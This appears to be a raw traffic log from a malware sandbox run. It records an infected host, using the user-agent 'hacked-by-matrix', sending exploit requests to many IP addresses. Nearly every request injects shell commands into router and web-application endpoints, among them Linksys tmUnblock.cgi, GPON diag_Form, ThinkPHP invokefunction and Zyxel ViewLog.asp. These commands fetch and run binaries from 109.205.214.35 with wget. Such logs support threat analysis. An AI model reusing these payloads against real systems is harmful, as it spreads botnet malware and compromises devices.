                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.649439096 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:55 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        767192.168.2.135438423.63.97.6680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.345876932 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.578804970 CET238INHTTP/1.0 301 Moved Permanently
                                                        Location: https:///login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$
                                                        Server: BigIP
                                                        Connection: Keep-Alive
                                                        Content-Length: 0
                                                        Mar 21, 2024 05:22:55.628683090 CET238INHTTP/1.0 301 Moved Permanently
                                                        Location: https:///login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$
                                                        Server: BigIP
                                                        Connection: Keep-Alive
                                                        Content-Length: 0
                                                        Mar 21, 2024 05:22:55.729655981 CET238INHTTP/1.0 301 Moved Permanently
                                                        Location: https:///login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$
                                                        Server: BigIP
                                                        Connection: Keep-Alive
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        768192.168.2.1333852104.248.45.24080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.360003948 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:06.668241024 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:06.844213009 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:06 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        769192.168.2.1356828112.74.73.1580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.395790100 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.795074940 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:55 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        770192.168.2.1356784172.65.99.22155555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.464122057 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        771192.168.2.134874695.57.104.23480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.497853994 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:55.775850058 CET964INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                        Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.30 26Oct2018Date:
                                                        Mar 21, 2024 05:22:56.607716084 CET964INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                        Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1 404 Not FoundServer: mini_httpd/1.30 26Oct2018Date:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        772192.168.2.135332618.223.94.378080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:55.514828920 CET442OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 41 6d 61 6b 61 6e 6f 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+Amakano.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
                                                        Mar 21, 2024 05:22:55.625669003 CET188INHTTP/1.1 200 b'OK'
                                                        Server: Werkzeug/2.1.2 Python/3.8.10
                                                        Date: Thu, 21 Mar 2024 04:22:55 GMT
                                                        b'Content-Type': b'text/plain'
                                                        Transfer-Encoding: chunked
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        773192.168.2.134913054.250.57.15780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.457330942 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:56.743268967 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>
                                                        Mar 21, 2024 05:22:58.185581923 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        774192.168.2.1355190118.172.2.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.649787903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        775192.168.2.1337292212.56.50.19443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.649847984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        776192.168.2.1348702212.22.161.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.649868965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        777192.168.2.1359018109.138.243.101443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.649877071 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        778192.168.2.135940080.77.86.9580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:56.721592903 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:56.842771053 CET1286INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:56 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Cache-Control: no-cache, private
                                                        Vary: Origin
                                                        X-Clockwork-Id: 1710994976-7778-2033127856
                                                        X-Clockwork-Version: 5.1.12
                                                        Server-Timing: app; dur=25.38800239563; desc="Application", timeline-event-0; dur=3.9370059967041; desc="Controller"
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Cache-Control: no-cache, private
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Transfer-Encoding: chunked
                                                        Content-Type: application/json
                                                        Data Raw: 31 65 61 62 0d 0a 7b 0a 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 54 68 65 20 72 6f 75 74 65 20 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 2e 22 2c 0a 20 20 20 20 22 65 78 63 65 70 74 69 6f 6e 22 3a 20 22 53 79 6d 66 6f 6e 79 5c 5c 43 6f 6d 70 6f 6e 65 6e 74 5c 5c 48 74 74 70 4b 65 72 6e 65 6c 5c 5c 45 78 63 65 70 74 69 6f 6e 5c 5c 4e 6f 74 46 6f 75 6e 64 48 74 74 70 45 78 63 65 70 74 69 6f 6e 22 2c 0a 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 70 68 70 22 2c 0a 20 20 20 20 22 6c 69 6e 65 22 3a 20 34 34 2c 0a 20 20 20 20 22 74 72 61 63 65 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 2e 70 68 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 65 22 3a 20 31 36 32 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 75 6e 63 74 69 6f 6e 22 3a 20 22 68 61 6e 64 6c 65 4d 61 74 63 68 65 64 52 6f 75 74 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 63 6c 61 73 73 22 3a 20 22 49 6c 6c 75 6d 69 6e 61 74 65 5c 5c 52 6f 75 74 69 6e 67 5c 5c 41 62 73 74 72 61 63 74 52 6f 75 74 65 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 2d 3e 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f
                                                        Data Ascii: 1eab{ "message": "The route cgi-bin/ViewLog.asp could not be found.", "exception": "Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException", "file": "/var/www/wls-core-ui-new/vendor/laravel/framework/src/Illuminate/Routing/AbstractRouteCollection.php", "line": 44, "trace": [ { "file": "/var/www/wls-core-ui-new/vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php", "line": 162, "function": "handleMatchedRoute", "class": "Illuminate\\Routing\\AbstractRouteCollection", "type": "->" }, { "file": "/var/www/wls-core-ui-new/vendor/laravel/framework/src/
                                                        Mar 21, 2024 05:22:56.842832088 CET1286INData Raw: 49 6c 6c 75 6d 69 6e 61 74 65 2f 52 6f 75 74 69 6e 67 2f 52 6f 75 74 65 72 2e 70 68 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 65 22 3a 20 37 35 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 75 6e 63 74 69 6f 6e 22 3a 20 22
                                                        Data Ascii: Illuminate/Routing/Router.php", "line": 754, "function": "match", "class": "Illuminate\\Routing\\RouteCollection", "type": "->" }, { "file": "/var/www/wls-core-ui-new/
                                                        Mar 21, 2024 05:22:56.842936039 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 2d 3e 22 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 66 69 6c 65 22 3a 20 22 2f 76 61 72 2f 77 77 77 2f 77 6c 73 2d 63 6f
                                                        Data Ascii: "type": "->" }, { "file": "/var/www/wls-core-ui-new/app/Http/Middleware/RefreshToken.php", "line": 20, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illumin
                                                        Mar 21, 2024 05:22:56.842962980 CET1286INData Raw: 77 6c 73 2d 63 6f 72 65 2d 75 69 2d 6e 65 77 2f 76 65 6e 64 6f 72 2f 6c 61 72 61 76 65 6c 2f 66 72 61 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 50 69 70 65 6c 69 6e 65 2f 50 69 70 65 6c 69 6e 65 2e 70 68 70 22 2c 0a 20 20
                                                        Data Ascii: wls-core-ui-new/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php", "line": 180, "function": "handle", "class": "Illuminate\\Foundation\\Http\\Middleware\\ConvertEmptyStringsToNull",
                                                        Mar 21, 2024 05:22:56.843025923 CET1286INData Raw: 6d 65 77 6f 72 6b 2f 73 72 63 2f 49 6c 6c 75 6d 69 6e 61 74 65 2f 46 6f 75 6e 64 61 74 69 6f 6e 2f 48 74 74 70 2f 4d 69 64 64 6c 65 77 61 72 65 2f 56 61 6c 69 64 61 74 65 50 6f 73 74 53 69 7a 65 2e 70 68 70 22 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: mework/src/Illuminate/Foundation/Http/Middleware/ValidatePostSize.php", "line": 27, "function": "Illuminate\\Pipeline\\{closure}", "class": "Illuminate\\Pipeline\\Pipeline", "type": "->"
